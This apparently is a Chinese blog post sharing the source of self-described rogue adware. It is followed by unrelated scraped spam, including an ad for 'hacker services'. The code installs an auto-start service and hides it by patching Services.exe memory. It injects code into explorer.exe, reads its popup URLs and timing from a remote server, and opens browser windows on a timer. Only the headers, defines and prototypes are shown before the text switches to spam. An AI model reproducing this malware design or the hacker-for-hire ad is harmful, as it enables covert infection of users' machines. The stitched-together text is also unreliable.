ps:请勿用于非法用途,仅供技术研究之用。
by:yunshu
这个东西的主要功能就是去网上一个URL读取配置文件,拿到需要弹出的窗口以及周期时间,然后开始弹……程序安装成服务,并设置为自动启动。启动之后写入一段代码到explorer.exe进程中,也就是这里在弹网页,然后将服务停止。
我写的代码没什么技术含量,唯一的是使用了我们team的zzzevazzz的隐藏服务代码,最开始他是发在ph4nt0m的核心区的。不过他已经在自己的blog写过,所以我发出来也没问题了。
这个是主函数,安装,读取配置,注入代码用的。
代码:
/**************************************************************************************************
* 1. 给XX作的流氓软件
* 2. 隐藏服务是copy的EVA的代码,修改Services.exe进程内存。
**************************************************************************************************/
#include
#include
#include
#include
#include
// 是否记录日志
//#define DEBUG
#ifdef DEBUG
#define DEBUG_LOG "c:\debug.txt"
// 日志记录函数
void LogToFile( WCHAR * );
#endif
#include "ControlService.h"
#include "HideService.h"
#include "CustomFunction.h"
#pragma comment (lib, "Advapi32.lib")
#pragma comment (lib, "Shell32.lib")
#pragma comment (lib, "ws2_32.lib")
#pragma comment (lib, "User32.lib")
#define REMOTE_FUNC_LENGTH 1024 * 10 // 拷贝的长度
#define TARGET_PROCESS L"explorer.exe" // 要注入代码的目标进程
#define CONFIG_HOST "www.icylife.net" // 读取配置信息的服务器
#define CONFIG_PATH "/url.txt" // 配置信息在配置服务器的路径
#define IE_PATH "C:\Program Files\Internet Explorer\iexplore.exe"
#define DEFAULT_URL "http://www.he100.com" // 默认弹出的窗口
#define DEFAULT_SLEEP_TIME 30 * 60 * 1000 // 默认弹出窗口的间隔时间
// 宏,转换字符串为unicode
#define MULTI_TO_WIDE( x, y ) MultiByteToWideChar( CP_ACP, MB_PRECOMPOSED,y,-1,x,_MAX_PATH );
// 弹出窗口之间的间隔时间
int sleep_time;
// 弹出的url地址
char url_path[512] = { 0 };
/**************************************************************************************************
* 函数原形
**************************************************************************************************/
void ServiceMain( DWORD, char **); //服务入口
BOOL SetDebugPrivilege( ); //获取debug权限
DWORD GetProcessIdByName(WCHAR * ); //获取进程的PID
void InjectCode( ); //写代码到远程进程
void GetConfig( ); //更新配置,获取要弹出的地址和弹出间隔时间
/**************************************************************************************************
老师我想对你说作文800字(老师我想对你说作文) 老师我想对你说作文800字 老师我想对你说作文800字 老师我想对你说作文800字(一): 老师我想对你说 在我的成长道...
2017年接近尾声,近日,《人民日报》发布了一份“京东3C文旅2017年度榜单”,依据京东电商平台提取数据,从销售额、销量等维度全方位盘点了京东3C文旅一年以来的表现。在多项排名中,国产品牌均取得...
近日,由湖南省人民政府、工业和信息化部联合举办的“2020世界计算机大会”在长沙举行。大会邀请中外院士、行业专家及企业家从计算软硬件技术、信息安全与网络通信技术、新兴产业应用等多个维度展开深入探讨与交...
创业致富,是不少年轻人所追求的梦想,要想创业成功就得要寻找一些目前有市场的项目来投资。然而,不少人问到,现在干什么赚钱呢?今天就给大家说说几个没人注意的行业。 现在干什么赚钱?总以为在高端大气上...
2019年,门槛最低,成本最低,发展空间最大的创业项目是什么,创业领域在哪儿?抖音带货?土味视频?拍视频卖三农产品?说的都对,但都不够准确 通俗点来说,其实就是通过各式各样的媒体渠道,将自己想要表达...
怎样自学编程黑客(黑客自学编程)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客业务、...